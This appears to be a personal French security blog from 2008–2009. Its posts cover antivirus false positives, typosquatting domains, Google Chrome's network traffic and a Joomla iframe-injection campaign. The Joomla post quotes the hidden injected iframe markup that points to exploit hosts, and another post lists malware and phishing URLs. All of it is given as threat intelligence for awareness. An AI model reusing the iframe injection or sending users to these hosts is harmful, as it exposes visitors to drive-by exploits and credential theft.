Overblog
Suivre ce blog Administration + Créer mon blog
15 septembre 2009 2 15 /09 /septembre /2009 23:16
Hey as people say: never say never, or never say "it'll never happen to them".

Nonetheless, even an AV vendor may not apply the basics of web server security: non-disclosure of versions information.


This URL comes from the virus sginatures added and listed in a daily update description. Therefore, anybody could access it, I did not have to try anything of hack in any way the ESET HTTP server.

I told my contacts at ESET about that. 72h later, it was fixed.

Though, I would point out a few details:
- apache 2.2.9 is obsolete (cf. http.apache.org)
- PHP 5.2.6 is also obsolete...

Well, the guys at ESET still some work to get done before they can affirm their server is really secured... 
Partager cet article
Repost0
23 juin 2009 2 23 /06 /juin /2009 00:37
Quand on est veilleur, on se doit de surveiller même les offres "grand public", car c'est justement elles qui pourraient tenter l'utilisateur, bien qu'il soit dans un contexte professionnel...

Cette fois-ci, j'ai donc jeté un nouveau coup d'oeil au Google Pack.

Quelques changements ont eu lieu dans le choix des logiciels faisant "partie" du "pack Google", bref.

J'ai donc téléchargé (presque) la totale, mais je n'ai pas osé l'outil Norton de peur d'un réel conflit avec mon AV déjà installé, et aussi suite à de nombreuses mauvaises expériences de problèmes sans fin pour la désinstallation des produits Norton...

Revenons à nos moutons, je lance le système Google Pack. L'intertace s'ouvre, on apprécie le mode tout automatique.

Un certain "spyware doctor" (de PC-Tools) va s'installer. De quoi challenger mon ESET.

Hé bien surprise, durant l'installation, ESET a du avoir tellement peur qu'il a lui-même
bloqué le pilote déployé par Spyware Doctor... et m'annonce un "PCAgent".

Le pire, c'est que l'installation s'est soit-disant bien passée...  Preuve que le système de contrôle d'intégrité après installation de PC Tools n'est peut être pas si au point que ça...

Presque inquiétant, le résultat complètement incohérent des scans antiviraux multimoteur sur : 
www.virustotal.com :
http://www.virustotal.com/fr/analisis/ea25afa088e47cb1bfa985f110927e88326f75b060d0c58405c211d5416b4dff-1245710329

Spyware Doctor est-il :
- un voleur d'identifiants bancaires ? (Win32.Banker)
- un élément de Win32/Monitor.PCAgent ?
- une variante (encore une !) de Trojan/Agent ?
- ou encore mieux : un "Unclassified Malware" ?  (c'est quoi donc ? )

J'avoue ne pas m'y retrouver moi-même.


Question finale :
Mais comment voulez-vous qu'un utilisateur lambda s'y retrouve si son antivirus sonne l'alarme quand il est en train d'installer un logiciel "made in google"...?

Parce que c'est bien connu : tout ce qui vient de Google est à la mode, sécurisé, et indispensable...
Non ? pourtant c'est ce qu'on entend souvent...



================ Eng summary ===================

After I had installed the Google Pack, my ESET AV warned me about a sys file being copied to System32, during the installation of Spyware Doctor (component of the Google Pack...).
You can see it on the screenshot above.
My question is: how a lambda user could make the difference between that kind of security alarm, and a real one?
What or who should he trust:: Google Inc or ESET?
Sometimes I don't understand AV policy detection choices!
Partager cet article
Repost0
1 juin 2009 1 01 /06 /juin /2009 22:56
Une fois n'est pas coutume, je vais jouer l'internaute lambda :)

On m'a parlé du site http://www.geoscopie.com/  qui soit-disant est bien classé au niveau Intelligence Économique.

En allant dessus, j'ai eu quelques difficultés à comprendre de quoi il était question, et pour cause : je ne suis pas bilingue en japonais...!

Voici une pseudo-traduction (merci aux gens de Mountain View) :
http://translate.google.com/translate?prev=hp&hl=fr&js=n&u=http%3A%2F%2Fwww.geoscopie.com&sl=ja&tl=fr&history_state0=

Et le plus fort, c'est que même avec la traduction, j'ai du mal à voir le rapport.
Entre l'achat de maison en bois, les caméras de sécurité, la robe de mariée, etc... j'avoue y perdre le fil.

Et pire, quand on regarde le WhoIs de ce domaine : http://www.domaincrawler.com/domains/view/http://www.geoscopie.com/ :
- le "networksolutionsprivateregistration.com" en technical contact ne saute pas aux yeux mais presque...
- les serveurs NS "WEBSITEWELCOME.COM"  classés rouge par Netcraft... (lien pour info)

Alors vengeance ? je le croirais presque...

Moralité :ne jamais considérer que parce qu'une URL est à priori connue, on peut l'ouvrir dans son navigateur sans crainte : l'antivirus + filtrage sur URL sont indispensables !


PS : le VRAI site, lui, est toujours là, mais l'URL est : geoscopies.net   ....
Partager cet article
Repost0
27 janvier 2009 2 27 /01 /janvier /2009 23:47
Comme dit le dicton "ce sont les cordonniers qui sont souvent les plus mal chaussés"...
Et là, je trouve qu'on n'est pas loin !

Comme beaucoup dans le métier, je connais et utilise très souvent les outils SysInternals (au passage, chapeau bas pour la maîtrise technique des systèmes Windows, de leurs API et de leurs couches basses...).

Mais récemment, en voyant Process Explorer planter allègrement, j'ai commencé à me poser des questions.
Le fameux ProceXP ne voulait même plus être relancé, soit disant pour un problème d'allocation de ressources.

Voyons voir la config du poste:
- portable avec un T5500
- 4 Go de RAM
- disque SATA
- Process Explorer dernière version (fourni avec la dernière version de la suite SysInternals, en date du 15/01/09)
et ... aucune application graphique, jeu, ou autre glouton en ressources, de lancé !


Pourtant, j'ai régulièrement des avertissements du type :

N'y croyant pas réellement, je fais donc "annuler". Pourquoi Process Explorer pourrait-il occasionner une perte de données sur mon ordinateur, alors que je l'utilise justement pour surveiller ce qu'il se passe sur la machine, et ainsi... éviter tout ennui...

Et fatalement, on en vient à :(le comble !) :



Mais quand on regarde les ressources prises par Process Explorer, il se passe visiblement quelque chose (image en meilleure définition) :


Presque 550 Mo de mémoire système "virtuelle" ? C'est totalement anormal et aberrant !

Je crains donc qu'il s'agisse d'une fuite de mémoire sur l'outil Process Explorer (Microsoft ayant englouti SysInternals...), outil qui justement était connu pour déceler les fuites de mémoire...  c'est même indiqué sur leur site.

Affaire à suivre...
Je n'avais pas constaté tous ces plantages avec la version précédente de ProceXP...

Partager cet article
Repost0
16 décembre 2008 2 16 /12 /décembre /2008 23:12
Comme indiqué dans le titre, et contrairement à ce semblent croire nombre d'internautes, un "faux moteur de recherche", ça existe...

Je prépare d'ailleurs un article à ce sujet, il sera publié sur une plateforme spéciale, et je mettrai certainement quelques éléments ici, en complément.

Je peux cependant déjà indiquer que le site signalé est une contrefaçon d'un des moteurs de recherche les plus connus au monde, puisqu'il indique le nom de ce fameux moteur en "arrière plan" de sa page d'accueil, et ce bien qu'il n'y soit pas affilié / autorisé.

Alerté sur le sujet, le fameux moteur de recherche (le vrai) va probablement lancer une procédure en justice, pour utilisation abusive de sa marque...

A suivre donc !
Partager cet article
Repost0
30 octobre 2008 4 30 /10 /octobre /2008 23:06

Ha le problème de la faute de frappe...
Combien de collègues avons-nous entendu râler car ils venaient de faire une faute en tapant au clavier... (ex : "doigts carrés à la noix...").

Qu'est-ce que le typo-squatting, alias parasitage de nom de domaine Internet ?
C'est réserver un nom de domaine proche d'un nom connu (vous avez dit Google ?) mais avec une variante dans la syntaxe. Cette variance est censée correspondre à une faute de frappe que peut faire un utilisateur en allant visiter le site connu (www. google .fr).
Evidemment, si l'utilisateur fait réellement cette faute de frappe, et que le nom de domaine a été réservé, il n'y aura pas d'erreur affichée dans le navigateur... l'utilisateur sera envoyée sur une page de façon totalement arbitraire !
En un sens, on peut considérer que le typosquatting est proche du cyberquatting. Sauf que le cas du "typo" est que l'on vise indirectement une société, on ne réserve pas le nom de domaine correspondant exactement à la marque...
Ex de cybersquatting :
http://www.france2.com/, il y a 2 mois encore un site pornographique ! . Idem pour france3.com.
L'un des cas certainement les plus connus pourrait être "whitehouse.com", qui est resté pendant des années... un site porno.

Le fait de réserver un nom de domaine dont la syntaxe varie légèrement du domaine de la vraie cible, fait que ces enregitrements de noms de domaines parasites sont bien plus difficiles à détecter.


La surveillance de ce type de malveillance peut faire partie d'une activité de veilleur sécurité, mais je trouve que certains cas méritent d'être diffusés plus largement, pour information et sensibilisation.

Voici donc quelques exemples du genre, qui me semblent intéressants (je prends la cible type : Google) :

- googllle.com : fausse page de recherche, page "générique"... mais on note le "copyright googlle.com" en bas de page !

- qoogle.com : assez drôle, on est renvoyé vers ce qui semble être un vrai google, mais l'URL est : http://www.sohaibkhan.com/ ...  (encore un site à rajouter aux systèmes de filtrage Internet, pour certains...)

- http://qooqle.com/  : en voici un vrai, complet !!!  ce site affiche une interface utilisateur de type moteur de recherche, mais ce n'est pas Google !! Les résultats de recherche, comme "mp3" donnent des résultats totalement différents. Ce qui fait la force de cet exemple, c'est l'utilisation du "q" à la place du "g". Ceci, dans une mise en page où les liens Internet sont généralement soulignés, fait que l'utilisateur ne verra pas la différence entre les 2 lettres ! (idem pour l'exemple précédent).

- http://www.qoogle.fr/   qu'est-ce donc ? le jeu avec Google semble clair !  pourquoi le WhoIS est-il en mode anonyme ? http://www.whois.net/whois_new.cgi?d=qoogle&tld=fr


-----------

Même des sites parlant de sécurité se font viser !!


- http://www.avcomparative.org/   le fameux site de comparaison de solutions antivirales... il est plutôt drôle de constater que dans cette page, justement, on trouve des liens pour acheter des solutions comme Norton, AVAST, NOD32, PCTools...   comme on dit, l'argent n'a pas d'odeur... ?


- http://pagejaune.com   les PagesJaunes sont certainement l'un des sites les plus utilisés en France. Et là, je parle de dévu, un de mes proches a voulu aller sur le site des PagesJaunes, et a tapé cette adresse... évidemment ce fut un peu dur à expliquer, mais tellement réaliste !!



Ceci ne fait que démontrer à nouveau (s'il en était besoin) la nécessité d'avoir un filtrage Internet
- sur URL
- sur le contenu, incluant antivirus.
Il ne faut pas oublier que les utilisateurs ne feront pas forcément exprès d'aller sur des sites malveillants

Partager cet article
Repost0
17 octobre 2008 5 17 /10 /octobre /2008 01:19
Décidément, les cibles des attaques informatiques se diversifient de plus en plus, pour toucher des environnements ou des outils qu'on se soupçonnerait pas d'être visés...

Voici quelques éléments, concernant ce qui semble être une attaque visant Joomla! .
Au passage, un organisme spécialisé dans la veille virale m'a confirmé des attaques en cours contre Joomla!.

L'attaque semble consister à insérer une ou plusieurs balises iFrame dans le code du site piraté.

Ces balises pointent sur (entre autres) :
- http://wsx2host.net/count.php?o=
- http://pinoc.org/exploits/x7b.php
- msn-analytics.net/count.php?o=2

La recherche Google d'un de ces liens "malins" paraît également intéressante, et tend à montrer une réelle campagne d'attaque en cours :
http://www.google.fr/search?q=msn-analytics.net&btnG=Rechercher&hl=fr&rlz=1C1GGLS_frFR291&sa=2
On peut voir des administrateurs / webmasters qui ne comprennent pas ce qui arrive à leur site... et c'est souvent les utilisateurs qui leur signalent la présence du lien dangereux dans le code de leurs pages.
Les administrateurs suppriment le code malin, mais celui-ci revient souvent.


Exemple de balises iFrames injectées sur des sites (avec Joomla!) vulnérables :
iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe><?iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe>


On pourra noter la ressemblance entre : google-analytics.com et    ... msn-analytics.net !!
Est-ce volontaire ? le nom de cette balise est-il conçu ainsi pour sembler "inoffensif" à première vue ?
On peut se poser la question.

D'ailleurs, les équipes de MSN pourraient attaquer le propriétaire de ce site (msn-analytics.net), car "msn" est une marque déposée... et il semble que Google pourrait également attaquer sur le terme "analytics" :
http://www.google.com/analytics/tos.html
Lequel des 2 est visé réellement, mystère... peut-être les 2 ?


Détails concernant msn-analytics.net :


Avertissement de sécurité :
http://safeweb.norton.com/report/show?url=msn-analytics.net

Le WhoIs sur le site de la CNIL ne semble pas donner de réponse probante pour ce domaine. Heureusement, d'autres WhoIs semblent eux le connaitre :
http://www.whois.net/whois_new.cgi?d=msn-analytics&tld=net

On pourra noter que la date d'enregistrement du domaine est très récente, il semble donc qu'on ait affaire à une campagne également récente...

Mise à jour du 30/10/08 :

Des tests montrent que l'exploit tenté par le site "msn analytics", tout comme les 2 autres visiblement, concerne une vulnérabilité sur QuickTime.
La dernière version (7.5.5) en date de QuickTime ne s'est pas révélée vulnérable lors de la navigation sur le site.
De même, la version 7.2 ne s'est pas montrée vulnérable, tout comme la 7.1.6.
Je n'ai pas eu le temps de faire des tests avec les versions 6...

Cependant, on peut se poser les questions suivantes : s'agit-il d'une erreur dans la mise en place de l'exploitation de faille, peut-être que les éléments d'attaque ne sont pas tous opérationnels ? ou s'agit-il réellement de l'utilisation d'une ancienne faille (ce qui semble étonnant vu la récence de la campagne d'attaque des Joomla...).



Bref, encore une raison de :
- scanner les flux HTTP au niveau antiviral (passerelles ou postes, selon l'architecture)
- scanner en local les pages d'un serveur Web, ne serait-ce que de nuit (dans un Cron par exemple et avec un ClamAV... pour Unix / Linux). On peut également envisager simplement un contrôle d'intégrité de ces pages...
- ne pas cliquer sur tout lien dès l'instant qu'il contient 1 mot clé "connu"  (type "msn")....
Partager cet article
Repost0
17 septembre 2008 3 17 /09 /septembre /2008 23:49
Allez, autant pour l'info que pour la bonne blague, je poste un message sur le sujet.

Depuis quelques temps, sur mes propres machines, ainsi que sur des machines neuves achetées dans le commerce, il semble que Windows Live Messenger (dernière version) plante allègrement sous Vista SP1... dès qu'on entre ses identifiants Live Mail, et qu'on lance la connexion...


Après investigation (je passe les détails sur tous les tests menés... allant jusqu'à l'ajout de RAM !), il apparaît que :

- si l'on active le mode "administrateur" pour le lancement de Win Live Messenger, un assistant d'installation apparaît, soit-disant pousuit une installation, et se termine.

- Après lancement, donc en mode administrateur, Windows Live Messenger ne plante plus !

- si l'on désactive l'attribution automatique et forcée des droits d'administration à Live Messenger, alors il recommence à planter dès l'ouverture de session !



Alors les questions qui viennent :

Quid de l'UAC, une des grandes (fameuses !) fonctions de sécurité arrivées avec Vista, qui témoigne d'une gestion des processus avec des privilèges faibles par défaut ?  

Doit-on forcer MSN en mode administrateur ?   quid du risque viral !!
avec le nombre de codes viraux se propageant par ce biais, en plus des failles de sécurité... tout va bien.

N'est-il pas connu du monde Unix, depuis des années déjà, qu'il est largement préférable de faire tourner des processus avec des comptes restreints en droits ? (Evidemment que oui...)

Vista a-t-il tranché du modèle Microsoft en implémentant ce modèle de gestion des processus ? Oui....

MAIS !
Que doit-on faire quand même les applications Microsoft, grand public, parmi les plus connues, plantent sauvagement sans privilèges administrateur ???


[humour]
Mon linux s'en retourne dans sa cage virtuelle !


Captures d'écran à venir.

Partager cet article
Repost0
2 septembre 2008 2 02 /09 /septembre /2008 21:37
Comme beaucoup d'autres visiblement, ma curiosité envers le "nouveau bébé" de Google s'est ranimée à l'annonce de la sortie du "fureteur à la Goooogle".

Je l'ai donc téléchargé et installé.

Config de test :
- Vista Pro SP1
- Firefox 3.0.1 (je précise pour la suite)
- K.I.S 2009
- DNS primaire de la machine : OpenDNS Resolver1 : 208.67.222.222
- DNS secondaire : adresse de la "boîte" ADSL : le bon vieux 192.168.1.1


Installation :

Fidèle à l'habitude de Google, c'est du "tout automatisé", dès l'instant qu'on clique sur "Accepter et installer", en validant donc de facto les conditions d'utilisation...
L'URL (la vraie) de téléchargement est la suivante :
http://dl.google.com/update2/installers/ChromeSetup.exe


On peut déjà remarquer la case à cocher (ou pas) : "Facultatif : Aidez-nous à améliorer Google Chrome en envoyant automatiquement des statistiques d'utilisation et des rapports d'erreur à Google."
Vu que l'installation se déroule de façon transparente dans le navigateur (fenêtre apparaissant au premier plan), ce clic pourrait avoir des effets sur les paramétrages directement durant l'installation de Google Chrome.

Me mettant à la place d'un utilisateur bienveillant (y compris au sein d'une Entreprise, sur un PC pro...), je décide  de cocher la fameuse case pour "aider à améliorer Google"......


1er démarrage :

Chrome a la capacité de détecter la présence de Firefox sur la machine (pas de mention de celle de Internet Explorer 7...). Chrome propose dès la fin de l'installation d'importer des informations de Firefox, notamment les favoris.
Petit couac, il faut fermer Firefox pour que cela fonctionne, alors qu'on vient justement de lancer le téléchargement + installation de Chrome... à partir de Firefox.

Passé cette étape, Chrome démarre enfin, réellement.

Et là, ce qui frappe, ce sont les nombreuses alertes du Firewall !
Voici une capture d'écran du trafic généré par Chrome, à son démarrage, alors que je n'avais demandé strictement aucune URL !   lien de la capture décran de la surveillance réseau de K.I.S 2009 si l'image ne s'affiche pas :



L'examen des logs du pare-feu peut amener à se poser des questions.
Que sont exactement les URL/IP suivantes

- TCP : ik-in-f100.google.com      |  66.249.99.100           |  port  80

- UDP :                  ?                           |  224.0.0.252               |  port 5355 ???

- TCP :                   ?                          |  74.125.77.147           |  port 443 ???

- TCP :                    ?                        |  199.7.58.72                |  port 80


Avec autant de connexions dès le démarrage, y compris en HTTPS, que fait Google ?...
Car c'est bien Google qui écoute le HTTPS sur 74.125.77.147

D'autant que le système utilisé est plutot bien pensé :
- pas ou peu de résolution de nom, ce qui complique la tâche des filtrages de contenu (ex : proxy HTTP), mais aussi réduit aussi la chance de pister ces connexions dans des rapports statistiques de navigation (une IP c'est plus discret...)
- connexion en HTTPS, qui comme on le sait, est relativement peu filtré en entreprise.
Bref, des idées afin de permettre à un maximum de données, générées par Chrome, de remonter à qui les écoute.



Etude des connexions après redémarrage de Chrome :

En fermant et ré-ouvrant G Chrome, d'autres connexions (encore plus obscures ?) apparaissent :

- TCP : 66.249.93.100
- TCP : 66.249.91.113
- TCP : 66.249.91.127
- TCP : 224.0.0.252
- TCP : 74.125.8.151
etc. !
Au passage, ces IP sont reférencées sur d'autres sites (devinez avec quoi on peut faire la recherche...).


Pas beaucoup d'informations pour ces URL... via RIPE.

Mais en cherchant différemment :  66.249.91.0 : propriétaire = Google Inc.
Idem pour 75.125.8.0

 
Cependant, il se trouve que si l'on examine un peu ces adresses, notamment 66.249.93.100, ce qui répond derrière ressemblerait à un proxy !! 
En effet, l'IP répond sur le port 80, et on peut surfer en l'indiquant comme proxy HTTP dans le navigateur...
S'agit-il de proxy d'anonymat ? pas tout à fait.

Pour être plus exact, on peut surfer avec 66.249.93.100:80 comme proxy HTTP, mais.... on ne peut aller que sur des sites hébergés directement chez Google !!

Cette pseudo liberté de navigation inclue visiblement la plupart des services de Google, tels que Google Docs, avec toujours accès personnalisé selon l'adresse GMail de l'utilisateur.
Je n'ai malheureusement pas le détail des permissions offertes par ces serveurs mandataires HTTP.

La question se pose donc : à quoi servent ces connexions sur ce qui semble être des proxies HTTP en accès restreint ?


------------------------------------------------------------------------------------------------------------------------------------------------------------

Fonctionnalités remarquables :

Google Chrome est capable de "corriger" les fautes de frappe des internautes, lorsqu'ils saisissent des URL !
Enfin un navigateur un peu intelligent sur ce point ! (ce n'est pas une nouveauté pour ceux qui ont utilisé les OpenDNS...)

Voici un petit exemple avec "meteofrance.com".
Autres exemples :

- www.googlecom = > redirigé vers recherche Google... de googlecom.

Cette fonctionnalité a des impacts assez forts à mon sens au niveau sécurité : Chrome va automatiquement proposer de "vrais sites" aux utilisateurs, si leur orthographe est proche de l'URL tapée.
Google a eu également la bonne idée de proposer la recherche sur son moteur, qui comme on le sait, corrige certaines fautes de frappe, et propose des résultats pour des sites "voisin" au niveau syntaxical.

Mais cette technologie ne permet (à priori) malheureusement pas d'éviter des cas comme :
-  www.pagejaune.com
- www.goole.com/
etc


On peut remarquer aussi que Chrome affiche en gras le nom réel du domaine où l'on navigue (en temps réel).
C'est le même principe que l'extension LocationBar de Firefox : diminuer les risques de "filouter" les utilisateurs en leur affichant en gros en gras, l'adresse réelle du site sur lequel ils sont.



===========================================================================================

Je vais m'arrêter pour un premier jet.

En résumé, il ressort que Google Chrome semble attractif, non seulement parce qu'il a l'étiquette Google, mais aussi pour ses fonctionnalités (à voir à l'usage).

Attention cependant
- au trafic réseau qu'il génère : http / https et IP distantes "anonymes"  = >  fuite d'info / suivi du trafic réseau difficile
- à son installation "transparente" et facile depuis un navigateur "quelconque" = > invasion des parcs informatiques existants...
- au bruit entourant sa sortie, qui contribue déjà à sa popularité

Une dernière petite note, en attendant confirmation par de plus amples tests : attention à la bande passante que Google Chrome demande (avec seulement 3 sites visités, je suis déjà à 7Mo de téléchargés...) !

Comme toujours, je posterai de plus amples informations dès que possible.




Partager cet article
Repost0
7 juillet 2008 1 07 /07 /juillet /2008 01:20

Je vais regrouper ici des alertes obtenues lors d'une navigation "standard".
La question peut se poser pour des gens qui n'ont pas d'analyse antivirale sur le flux HTTP...

découvert : virus Trojan-Downloader.Win32.Tibs.xu    URL: http://sum4count.net/pictures/tibs.jpg


Autres alertes (type phishing alias "filoutage") :
- bloqués : adresse d'un site de filoutage http://90.188.149.10/ws/aw-cgi/ebayisapi.dlluserconfirm    URL: http://90.188.149.10/ws/aw-cgi/eBayISAPI.dlluserconfirm/
- bloqués : adresse d'un site de filoutage http://62.106.97.144/.uk/cgi-bin/webscrcmd.php    URL: http://62.106.97.144/.uk/cgi-bin/webscrcmd.php
- bloqués : adresse d'un site de filoutage http://about-philosophy.ru/health/aging/isapi-de.php    URL: http://about-philosophy.ru/health/aging/isapi-de.php
- bloqués : adresse d'un site de filoutage http://item34253443643sfdsgdfet3909.nm.ru/itemz2702457z017q.html    URL: http://item34253443643sfdsgdfet3909.nm.ru/itemZ2702457Z017Q.html
- bloqués : adresse d'un site de filoutage http://singin-e-bay-com-ws-dlso.nm.ru/mye-bayforguests-dll.html    URL: http://singin-e-bay-com-ws-dlso.nm.ru/MyE-bayForGuests-dll.html  (joli !)
- bloqués : adresse d'un site de filoutage http://singinebatweba-ssinginebatwahs.pochta.ru/signincopartnerid2puserid-siteid/index.it    URL: http://singinebatweba-ssinginebatwahs.pochta.ru/SignIncopartnerId2pUserId-siteid/index.it


Pour ceux qui n'auraient pas reconnu, j'utilise (entre autres) K.I.S 7.

Gardons un oeil ouvert.
Je posterai d'autres infos au fur et à mesure.



#####=====----- Anglais / English -----=====######

Hi all,
I'll pose here strange antivirus and phishing alerts, that I got while I was just surfing the web, without any particular behaviour.

AV alerts :
virus Trojan-Downloader.Win32.Tibs.xu    URL: http://sum4count.net/pictures/tibs.jpg


Others :
- bloqués : adresse d'un site de filoutage http://90.188.149.10/ws/aw-cgi/ebayisapi.dlluserconfirm    URL: http://90.188.149.10/ws/aw-cgi/eBayISAPI.dlluserconfirm/
- bloqués : adresse d'un site de filoutage http://62.106.97.144/.uk/cgi-bin/webscrcmd.php    URL: http://62.106.97.144/.uk/cgi-bin/webscrcmd.php
- bloqués : adresse d'un site de filoutage http://about-philosophy.ru/health/aging/isapi-de.php    URL: http://about-philosophy.ru/health/aging/isapi-de.php
- bloqués : adresse d'un site de filoutage http://item34253443643sfdsgdfet3909.nm.ru/itemz2702457z017q.html    URL: http://item34253443643sfdsgdfet3909.nm.ru/itemZ2702457Z017Q.html
- bloqués : adresse d'un site de filoutage http://singin-e-bay-com-ws-dlso.nm.ru/mye-bayforguests-dll.html    URL: http://singin-e-bay-com-ws-dlso.nm.ru/MyE-bayForGuests-dll.html  (joli !)
- bloqués : adresse d'un site de filoutage http://singinebatweba-ssinginebatwahs.pochta.ru/signincopartnerid2puserid-siteid/index.it    URL: http://singinebatweba-ssinginebatwahs.pochta.ru/SignIncopartnerId2pUserId-siteid/index.it


I'll post further information as I find out.

Partager cet article
Repost0